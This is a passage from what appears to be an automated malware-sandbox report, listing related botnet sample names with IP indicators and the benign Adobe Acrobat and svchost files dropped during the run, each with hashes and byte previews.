                  Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                  • 161.184.66.8
                  Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                  • 209.52.250.243
                  1.elfGet hashmaliciousUnknownBrowse
                  • 161.188.162.114
                  Hilix.arm7.elfGet hashmaliciousMiraiBrowse
                  • 75.153.94.164
                  DF2.exeGet hashmaliciousUnknownBrowse
                  • 108.180.0.49
                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                  • 142.59.17.189
                  botx.mips.elfGet hashmaliciousMiraiBrowse
                  • 205.206.220.171
                  x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                  • 207.134.12.124
                  db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                  • 161.188.161.86
                  No context
                  No context
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1310720
                  Entropy (8bit):1.3073414921606872
                  Encrypted:false
                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrI:KooCEYhgYEL0In
                  MD5:278C2F63E594D06D9EE10C8CA84C748B
                  SHA1:3AAB97D9BF93AC2C32DB0F5DD724F9D74EB6EF36
                  SHA-256:0164706C5BA5BBA89AFB9BA0B5A0743CABFED7BE1C5CC465A901B29CB59D2921
                  SHA-512:05A25DBD547243013224D5D35EC3B72B1DF9CC68268B8E70A930A381E3B0D8ACF922B3687D25F818B531E03E14BA3CABE29D7063DDE5DF5B426E7E3C06A49E6A
                  Malicious:false
                  Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\svchost.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x86b27cf7, page size 16384, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):1310720
                  Entropy (8bit):0.4221454183837886
                  Encrypted:false
                  SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                  MD5:CE5FACE330DC9B71D81BE28B7E8F2671
                  SHA1:B82A81E49A65A0B76CAE80B763167209AADCE408
                  SHA-256:B0CB9F591B57BCB73352C6789CF51AA2D6F32433522623440B405B2EBDD13E2E
                  SHA-512:C6980F4EF70133D8F2EEC83E4728B2BB8DAD38D52BC25CF58606C857A2CECD2127587075D1A33A54D40901053896AED920C907BF217F7CE361ED094FF6BF9714
                  Malicious:false
                  Preview:..|.... .......A.......X\...;...{......................0.!..........{A..&...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................y.+..&...}E...................h8.&...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):0.07718459297174843
                  Encrypted:false
                  SSDEEP:3:WtlEYeR1luAjjn13a/9dSsllillcVO/lnlZMxZNQl:yyzRvbj53qas/GOewk
                  MD5:588B0DAE61EA2BDBA46BC0A7E17FAD0D
                  SHA1:7B62E8111BA905654C77DC82AB790A85AF2BC8D7
                  SHA-256:F708C94C640C65305829E370BF8B393559A8858AB12BF6D0FAC4AA1136C22F8F
                  SHA-512:C8BE1D79E28F030BDF9D693222A280BD1DED12708B0E5259FB3493590795D0CA74EF87AF854AB19483E8C5A1D69B3100EE41781155AC1BD8506101A5A3970CED
                  Malicious:false
                  Preview:...:.....................................;...{...&...}.......{A..............{A......{A..........{A]..................h8.&...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):292
                  Entropy (8bit):5.239470416190099
                  Encrypted:false
                  SSDEEP:6:iOuuJcyq2Pwkn2nKuAl9OmbnIFUt0ucuj1Zmwaucu1RkwOwkn2nKuAl9OmbjLJ:7u0RvYfHAahFUt0o1/aa5JfHAaSJ
                  MD5:DD7DCDA37D0691EFBC10BD5944B2F1B5
                  SHA1:22B831F9D036F19C00B23AD30B95CACCACAF6C0C
                  SHA-256:FF80789B38F237F71693D0C43D6681BC7E1DBA2FCF191595A8378EAD0B1E50E6
                  SHA-512:8DE84A7579A3E92958FB0F5D23924A7516AB2B069DAFC6B74D4EC76A7C44038A5A7BFA22CB692A364D8FA0DF5639C9F6DD95D033FF8A2D29091E3639BB793186
                  Malicious:false
                  Preview:2025/01/04-09:38:02.786 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/04-09:38:02.789 1c14 Recovering log #3.2025/01/04-09:38:02.789 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):292
                  Entropy (8bit):5.239470416190099
                  Encrypted:false
                  SSDEEP:6:iOuuJcyq2Pwkn2nKuAl9OmbnIFUt0ucuj1Zmwaucu1RkwOwkn2nKuAl9OmbjLJ:7u0RvYfHAahFUt0o1/aa5JfHAaSJ
                  MD5:DD7DCDA37D0691EFBC10BD5944B2F1B5
                  SHA1:22B831F9D036F19C00B23AD30B95CACCACAF6C0C
                  SHA-256:FF80789B38F237F71693D0C43D6681BC7E1DBA2FCF191595A8378EAD0B1E50E6
                  SHA-512:8DE84A7579A3E92958FB0F5D23924A7516AB2B069DAFC6B74D4EC76A7C44038A5A7BFA22CB692A364D8FA0DF5639C9F6DD95D033FF8A2D29091E3639BB793186
                  Malicious:false
                  Preview:2025/01/04-09:38:02.786 1c14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/04-09:38:02.789 1c14 Recovering log #3.2025/01/04-09:38:02.789 1c14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):336
                  Entropy (8bit):5.175973965575887
                  Encrypted:false
                  SSDEEP:6:iOumDqM+q2Pwkn2nKuAl9Ombzo2jMGIFUt0maGvZmwamhMVkwOwkn2nKuAl9OmbX:7u2+vYfHAa8uFUt0sv/a/V5JfHAa8RJ
                  MD5:551FDDFD23478853AC24A2FF501B275A
                  SHA1:17C9148D3239CF8901A713086F95D3AF62E4C8B3
                  SHA-256:E2A0D8DF65A315690E6FF8C367B06B38894E07FB9701CE5169C91D5B5E5B9595
                  SHA-512:DB4A9EA627951E49A25F7CCF3B36C2693E294DB445FD5064C489072E39B14721DD3E0EEB32C65BC52697917C64C38BC41DBE58C8FB7D464D71D62B3D1AA65E56
                  Malicious:false
                  Preview:2025/01/04-09:38:02.924 1cac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/04-09:38:02.926 1cac Recovering log #3.2025/01/04-09:38:02.927 1cac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):336
                  Entropy (8bit):5.175973965575887
                  Encrypted:false
                  SSDEEP:6:iOumDqM+q2Pwkn2nKuAl9Ombzo2jMGIFUt0maGvZmwamhMVkwOwkn2nKuAl9OmbX:7u2+vYfHAa8uFUt0sv/a/V5JfHAa8RJ
                  MD5:551FDDFD23478853AC24A2FF501B275A
                  SHA1:17C9148D3239CF8901A713086F95D3AF62E4C8B3
                  SHA-256:E2A0D8DF65A315690E6FF8C367B06B38894E07FB9701CE5169C91D5B5E5B9595
                  SHA-512:DB4A9EA627951E49A25F7CCF3B36C2693E294DB445FD5064C489072E39B14721DD3E0EEB32C65BC52697917C64C38BC41DBE58C8FB7D464D71D62B3D1AA65E56
                  Malicious:false
                  Preview:2025/01/04-09:38:02.924 1cac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/04-09:38:02.926 1cac Recovering log #3.2025/01/04-09:38:02.927 1cac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:JSON data
                  Category:modified
                  Size (bytes):475
                  Entropy (8bit):4.9549974170974975
                  Encrypted:false
                  SSDEEP:12:YH/um3RA8sqMXhsBdOg2H+caq3QYiubInP7E4T3y:Y2sRds5ydMHB3QYhbG7nby
                  MD5:54DCC72B64B7725AF3094E300416DB52
                  SHA1:BF428201787D5E55F520ED3F0D83346DAADC34A2
                  SHA-256:90AF0AC74BE45D452C2DED1F8C8B4824AD260C50A7290EF92025A95B97B76A89
                  SHA-512:DDFF905DBAB70337F65E747C4F5B5510D8F718D346ECBF6FA59115AC5AA00C13CFCF1CC35B815A2F518370BD9C7B3300BC68E6B6AF1DF59E8478C0836DF2C140
                  Malicious:false
                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380561495338616","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":184614},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):475
                  Entropy (8bit):4.9549974170974975
                  Encrypted:false
                  SSDEEP:12:YH/um3RA8sqMXhsBdOg2H+caq3QYiubInP7E4T3y:Y2sRds5ydMHB3QYhbG7nby
                  MD5:54DCC72B64B7725AF3094E300416DB52
                  SHA1:BF428201787D5E55F520ED3F0D83346DAADC34A2
                  SHA-256:90AF0AC74BE45D452C2DED1F8C8B4824AD260C50A7290EF92025A95B97B76A89
                  SHA-512:DDFF905DBAB70337F65E747C4F5B5510D8F718D346ECBF6FA59115AC5AA00C13CFCF1CC35B815A2F518370BD9C7B3300BC68E6B6AF1DF59E8478C0836DF2C140
                  Malicious:false
                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380561495338616","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":184614},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4320
                  Entropy (8bit):5.254659224097207
                  Encrypted:false
                  SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7fCpCNcV:etJCV4FiN/jTN/2r8Mta02fEhgO73goG
                  MD5:66278267ACC1F3242AA8BA94F1164A14
                  SHA1:49CDDDB5DA3F20EB3AFA29B1166C9934A5B37455
                  SHA-256:BF6FA752AC9B6B8F85C915CC116480218A6A11D585D1F033D598A5DFF7052BE7
                  SHA-512:FB867CA93DC628EC09508F95D8876584417C4E1EB259E3B13D70AEDC2D34CB88F65084E5638613070BED586C5E45FFC29F7C5EEF298DCDD704796880466D5EA8
                  Malicious:false
                  Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):324
                  Entropy (8bit):5.189756099168528
                  Encrypted:false
                  SSDEEP:6:iOBg6ulM+q2Pwkn2nKuAl9OmbzNMxIFUt/ga5Zmw9gS2qMVkwOwkn2nKuAl9Ombg:7BgbW+vYfHAa8jFUt/gG/9gSaV5JfHAo
                  MD5:EB6B7C5AC389FCC5764B2A232D70B526
                  SHA1:731BC7B1468241B62D19C615CCB2AAC9FDFDC85C
                  SHA-256:2893892C3CB4B46FDDB2F337E575ABD9991E24FD906EA8873924C143901C59C9
                  SHA-512:A54906FFB5FE1C64CD2E5176AA9958C52ADB394F6490949B035524447E9BB9F5A707455A822F6C042F74580BC8318C1F50161BA1A8FA83F810B824B185A225B4
                  Malicious:false
                  Preview:2025/01/04-09:38:03.149 1cac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/04-09:38:03.163 1cac Recovering log #3.2025/01/04-09:38:03.177 1cac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):324
                  Entropy (8bit):5.189756099168528
                  Encrypted:false
                  SSDEEP:6:iOBg6ulM+q2Pwkn2nKuAl9OmbzNMxIFUt/ga5Zmw9gS2qMVkwOwkn2nKuAl9Ombg:7BgbW+vYfHAa8jFUt/gG/9gSaV5JfHAo
                  MD5:EB6B7C5AC389FCC5764B2A232D70B526
                  SHA1:731BC7B1468241B62D19C615CCB2AAC9FDFDC85C
                  SHA-256:2893892C3CB4B46FDDB2F337E575ABD9991E24FD906EA8873924C143901C59C9
                  SHA-512:A54906FFB5FE1C64CD2E5176AA9958C52ADB394F6490949B035524447E9BB9F5A707455A822F6C042F74580BC8318C1F50161BA1A8FA83F810B824B185A225B4
                  Malicious:false
                  Preview:2025/01/04-09:38:03.149 1cac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/04-09:38:03.163 1cac Recovering log #3.2025/01/04-09:38:03.177 1cac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                  Category:dropped
                  Size (bytes):71190
                  Entropy (8bit):1.803090784434862
                  Encrypted:false
                  SSDEEP:192:MgDrl6HLFri62nPYier2+1UewCCFn78yRaWaQNakaga5aHGkavada7:7Drl6HLdL2nARr2+KmeNE
                  MD5:9A882D641506EC158A883A937C23C48F
                  SHA1:C6C721E8AC6A91A69BE51785454C4A018A1E8470
                  SHA-256:120CF17D9B846141F58B998052CDFD12C05FBA656ACDA6F66A75B1ADC6CFA92E
                  SHA-512:2DADFF18B6CA7DB8CF818BEBADD6ECBC4CEC731970B6B140E10F9271120FC1F2B625C9CAE90500D933B61521C5B2F1D7DFFCCBC1EA2874BC4968380C93E75342
                  Malicious:false
                  Preview:BM........6...(...u...h..... ..........................^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                  Category:dropped
                  Size (bytes):86016
                  Entropy (8bit):4.4451853166403374
                  Encrypted:false
                  SSDEEP:384:SeVci5t0iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:5js3OazzU89UTTgUL
                  MD5:A8B53DDE54A235BDCB1846BD62014C23
                  SHA1:687393553690BFB77F5088B29387F0BFDE8DB904
                  SHA-256:B04711F6473FE2A7B989700C643B510F28D2C1E2A5C2313F105ED96AD4CA577E
                  SHA-512:953265BA1F638C6D69B7C5F99978D468B180E85C34E4BC84E402C8EC6381E1FE72D8110C2276717D72CAC8963E447B324D2AEED351CE46AAE8920A9D71F38BCD
                  Malicious:false
                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:SQLite Rollback Journal
                  Category:dropped
                  Size (bytes):8720
                  Entropy (8bit):2.2149913708451177
                  Encrypted:false
                  SSDEEP:24:7+tXq+nuwKoqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9J:7MvnCoqvmFTIF3XmHjBoGGR+jMz+Lhv
                  MD5:639D34FD2DBE8037FE5A6DEC61A07ED7
                  SHA1:CE5299A0EF41322C376F128A81D0A95770EA1451
                  SHA-256:5FB73B035946A998DEEB5171D282D9FD5C641184118C444E6C895D9BE897E563
                  SHA-512:CF8945C9D28BD117054E2A29FC3A70F715120D9724E85B992A6705450A7704CB5FE524625D3745CA97A8C72C123C887F30FEC4189BA5E7320376FC52DC2F57B3
                  Malicious:false
                  Preview:.... .c......=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:Certificate, Version=3
                  Category:dropped
                  Size (bytes):1391
                  Entropy (8bit):7.705940075877404
                  Encrypted:false
                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                  Malicious:false
                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                  Category:dropped
                  Size (bytes):71954
                  Entropy (8bit):7.996617769952133
                  Encrypted:true
                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                  Malicious:false
                  Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):192
                  Entropy (8bit):2.756901573172974
                  Encrypted:false
                  SSDEEP:3:kkFkleku1llXfllXlE/HT8km7l1NNX8RolJuRdxLlGB9lQRYwpDdt:kKHT1llIT8ZRNMa8RdWBwRd
                  MD5:641780DDEAF6953208B84AB7A9420BDB
                  SHA1:1E82C1DEE1F3C65973B9D38BF1EEB4E561146163
                  SHA-256:800ECE5665A025D8ECA64E463DA5F04179F24BC8D89EC3E7E1C8BC70324BACC9
                  SHA-512:88B986FBB766F3F0B9F289A549A42BE8D5D8222F8C999931ECB8D7927FC8B756A3289BFE9E666D4325A9B4982BD289F59845901CBCC56BF172ED392DF570DA12
                  Malicious:false
                  Preview:p...... ........-A.J.^..(....................................................... ..........W....&...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  File Type:data
                  Category:modified
                  Size (bytes):328
                  Entropy (8bit):3.235702745302682
                  Encrypted:false
                  SSDEEP:6:kKF3Ll99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:t3LlkDImsLNkPlE99SNxAhUe/3
                  MD5:05D0FDD7F11F560362632135338E227E
                  SHA1:AF07F4FB32F90C63C98BA7C8C8B5EF74AAEA35D8
                  SHA-256:2D272624B0F5016E1C625C5AE3E9B31B529DD6FB0503E6B9B6A94445DD40C544
                  SHA-512:1FA52BE16D4A73FD7F420511AC6F1420F2EA0ED8459415350578500AB0A1A7B814760CA78B12038820A249CD6BD08FFF104F79636841328FA642C52E395CC03A
                  Malicious:false
                  Preview:p...... ........."Zn.^..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):295
                  Entropy (8bit):5.378882678209157
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJM3g98kUwPeUkwRe9:YvXKXNciSZc0vthZGMbLUkee9
                  MD5:DDBCAED1E37B555F03A6B1DD8EF65EDD
                  SHA1:D74954C137E8533E100696AEDD1242BC63AA6D37
                  SHA-256:A7E2EE000B40B12909AE955203C880C9F561465B31575A2B69D4373E9EA11602
                  SHA-512:56E818BBBB7511BEF386BBC2302B6E11AE1CE9DD1E2B5BB11BC1DEFB82B1FF67F86006742063754C5E07B91CC4E4D56BD1442B1871DA751D9AC66BF96CD067E1
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):294
                  Entropy (8bit):5.329620433850294
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfBoTfXpnrPeUkwRe9:YvXKXNciSZc0vthZGWTfXcUkee9
                  MD5:A902FE79C362416B738157E678A24682
                  SHA1:0E936BA0344E9986C94926DDA12304C71F4F9814
                  SHA-256:2C3C0BE8F0ABCB6D06E366E4C3D0223C63A8E35AD363C4A7D0D9625B97503568
                  SHA-512:63B5BA680C987515B4F1A360E7CCD46774021CAEF2C677D0BD469513F3C63204C723DD0F00F21CD2CC7DD3AD8F658069BEE4B82EFE295EF95A20B2654C43D06F
                  Malicious:false
                  Preview:{"analyticsData":{"responseGUID":"e16dbf9f-b7b0-40bd-9633-ad33718ba3a1","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736177319995,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):294
                  Entropy (8bit):5.308818181819498
                  Encrypted:false
                  SSDEEP:6:YEQXJ2HXNH8iyaVoZcg1vRcR0YChqoAvJfBD2G6UpnrPeUkwRe9:YvXKXNciSZc0vthZGR22cUkee9
                  MD5:18AF8222C4BC94754A64F4E84B454346
                  SHA1:F98F0E681C543465EE005FA318008FA3B88C1DC7
                  SHA-256:16F1C68BFE748FC8C248D3346C869B574FEF9C5FD53E73CEDFB19681E8ADE636
                  SHA-512:A2B8D4467353BDEAE1973A3AF1AD008080044BF1FB84C22A603AA111E09252EF3229F1869F93907DBE9C249BFF48D3B059127963F8BCF0F68734C1C81EDE6637
                  Malicious:false
